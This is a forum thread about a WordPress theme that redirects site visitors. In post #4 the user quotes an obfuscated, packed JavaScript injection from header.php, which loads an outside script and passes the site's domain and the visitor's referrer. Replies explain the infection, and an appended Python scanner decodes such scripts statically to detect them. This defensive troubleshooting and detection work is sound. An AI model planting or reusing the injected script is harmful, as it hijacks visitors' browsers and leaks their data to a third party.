Windows 7 Forums


Windows 7: My Website links to Malicious sites

23 Jan 2013   #1

Windows 7 Ultimate x32
 
 

Good Day

I just uploaded a Wordpress theme onto my Website webserver. Now I tested this theme on my home server before with no problems.

Since it has been on the webserver (at a trusted hosting company), I get URL redirects to malicious sites when I am browsing through my website.

Here is my site: http://evolutionof4.co.za

The malicious sites it links to are: themeforest.net, carolini.net amongst others.

I have scanned all my files on the webserver for malware (with avast), I have also scanned my site with Sucuri Security, but it did not pick up anything.

I don't think it is malware on MY PC, since I got the same problem from another PC on my LAN...

Any help?

Thank you


23 Jan 2013   #2

Microsoft Community Contributor Award Recipient

Win 7 Home Premium 64bit Ver 6.1.7600 Build 7601 - SP1
 
 

It is my understanding that Wordpress can be vulnerable to malicious code, have you seen these?

https://wordpress.org/support/topic/...malcious-sites

Some really good information here: FAQ My site was hacked « WordPress Codex

Do a search for: Wordpress Website links to Malicious sites
23 Jan 2013   #3

Windows 7 64 / Windows 8 64
 
 

1. Investigate if there is a .htaccess file and if it is infected or not.
2. Investigate if there is weird code in index.php or other php scripts. You might wish to extract default Wordpress 3.5 on top.
3. Disable your theme and plugins one by one and see if problems continue.


23 Jan 2013   #4

Windows 7 Ultimate x32
 
 

Thank you guys. The suggestions helped. Appreciate!

I think the following code is producing the problem. It was in my header.php page:

<script type="text/javascript">eval(function(p,a,c,k,e,r){e=function(c){return c.toString(a)};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('0.f(\'<2\'+\'3 5="6/7" 8="9://a.b/e/o/g?d=\'+0.h+\'&i=\'+j(0.k)+\'&c=\'+4.l((4.m()*n)+1)+\'"></2\'+\'3>\');',25,25,'document||scr|ipt|Math|type|text|javascript|src|http|themenest|net|||platform|write|track|domain|r|encodeURIComponent|referrer|floor|random|1000|script'.split('|'),0,{}));</script>
23 Jan 2013   #5

Microsoft Community Contributor Award Recipient

Win 7 Home Premium 64bit Ver 6.1.7600 Build 7601 - SP1
 
 

You are welcome, glad we could help!

Are you saying the whole section of code looks suspicious because it is code you do not remember using?

I am not very knowledgeable about Wordpress code, but these two areas do:
{return c.toString(a)};if(!''.replace(/^/,String)) and |scr|ipt|.

Return, if, then replace, and why would you place a bar between words?

Maybe gied could explain?

Have you been able to re-work the code and test it?
23 Jan 2013   #6

Windows 7 64 / Windows 8 64
 
 

This is a URL obscured in JS that loads some content. Typically, these things are used for loading malicious links and rarely have valid use.
As the header.php file is infected, one should think how it could happen:
1. Someone broke into the FTP account (scan your PC with a second-opinion scanner like Hitman Pro; do not use FTP in non-secure locations, as passwords can be sniffed, and you should change them)
2. Hosting provider screwed up
3. There is a vulnerability in a plugin or the theme.
4. The theme was infected before installation.
23 Jan 2013   #7

Microsoft Community Contributor Award Recipient

Win 7 Home Premium 64bit Ver 6.1.7600 Build 7601 - SP1
 
 

gied, how does a Wordpress user know what code is malevolent?
23 Jan 2013   #8

Windows 7 Pro. 64/SP-1
 
 

24 Jan 2013   #9

Windows 7 Ultimate x32
 
 

Thank you so much guys. Really appreciate the tips and helpful links.

@gied:
Quote: Originally Posted by gied
This is a URL obscured in JS that loads some content. Typically, these things are used for loading malicious links and rarely have valid use.
As the header.php file is infected, one should think how it could happen:
1. Someone broke into the FTP account (scan your PC with a second-opinion scanner like Hitman Pro; do not use FTP in non-secure locations, as passwords can be sniffed, and you should change them)
2. Hosting provider screwed up
3. There is a vulnerability in a plugin or the theme.
4. The theme was infected before installation.

I doubt if anyone hacked my FTP account. I use Wireshark myself and I know how easy it is to sniff unencrypted credentials. I think the theme I used (Themeforest.net) contained the code from the start, since the files were there from the start, I suspect... Also, some of the sites it redirects to are the theme creator's site - they just want exposure, traffic and SEO backlinks to their site...

Thank you for your expert opinion
24 Jan 2013   #10

Windows 7 64 / Windows 8 64
 
 

Anak: Obscure JS in a place that does not make sense is by default malicious. So is, for example, code that tries to determine the referer and/or redirects to another website. There are no very good tools to detect the code, but one has to inspect it for something strange. Also, one can compare files one by one with the ones of a clean install. The real problem is with unsafe plugins though. Or malicious theme creators.
DexterousDave:
If this is the theme creator's sites, then yeah. It is bad that Themeforest distributes malicious themes.
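
Added example (not part of the original thread or any poster's code): a static check for the packed-script pattern that was found in header.php, following the inspection advice above. It decodes the eval(function(p,a,c,k,e,r)...) wrapper by text substitution without running it and lists the URLs the script would load. The function names, the SAMPLE string and the example.invalid host are constructed for illustration, and only the packer form with radix 36 or lower is handled.

```python
import re
from pathlib import Path

# Tail of a Dean Edwards "packer" call: }('payload',radix,count,'w0|w1|...'.split('|')
PACKED = re.compile(
    r"\}\s*\(\s*'((?:\\.|[^'\\])*)'\s*,\s*(\d+)\s*,\s*(\d+)\s*,"
    r"\s*'((?:\\.|[^'\\])*)'\.split\('\|'\)")
DIGITS = "0123456789abcdefghijklmnopqrstuvwxyz"

def to_base(n, radix):
    """Same digits as JavaScript's Number.toString(radix), radix 2..36."""
    out = DIGITS[n % radix]
    while n >= radix:
        n //= radix
        out = DIGITS[n % radix] + out
    return out

def unpack(source):
    """Decode a packed script by text substitution only; nothing is executed."""
    m = PACKED.search(source)
    if not m or not 2 <= int(m.group(2)) <= 36:   # base-62 variant not handled
        return None
    payload = re.sub(r"\\(.)", r"\1", m.group(1))  # undo \' and \\ escapes
    radix, count = int(m.group(2)), int(m.group(3))
    words = m.group(4).split("|")[:count]
    table = {to_base(i, radix): w for i, w in enumerate(words) if w}
    decoded = re.sub(r"\b\w+\b", lambda t: table.get(t.group(0), t.group(0)), payload)
    return re.sub(r"'\s*\+\s*'", "", decoded)     # rejoin split literals: '<scr'+'ipt'

def scan_text(name, text):
    """Return (name, decoded script, URLs) if the text holds a packed script."""
    decoded = unpack(text)
    if decoded is None:
        return None
    return name, decoded, re.findall(r"https?://[^\s\"'<>]+", decoded)

def scan_tree(root):
    """Check every .php and .js file under a theme or site directory."""
    files = (p for p in Path(root).rglob("*") if p.is_file() and p.suffix in {".php", ".js"})
    hits = (scan_text(str(p), p.read_text(errors="replace")) for p in files)
    return [h for h in hits if h]

# Constructed sample in the same packed form, pointing at a placeholder host.
SAMPLE = r"""<script>eval(function(p,a,c,k,e,r){/* decoder body omitted */}('0.1(\'<2\'+\'3 4="5://6.7/8.9"></2\'+\'3>\');',10,10,'document|write|scr|ipt|src|https|example|invalid|t|js'.split('|'),0,{}));</script>"""

if __name__ == "__main__":
    print(scan_text("header.php", SAMPLE))
```

Run scan_tree() over a downloaded copy of the theme directory before uploading it; any hit in a theme file deserves a manual look at the decoded URL.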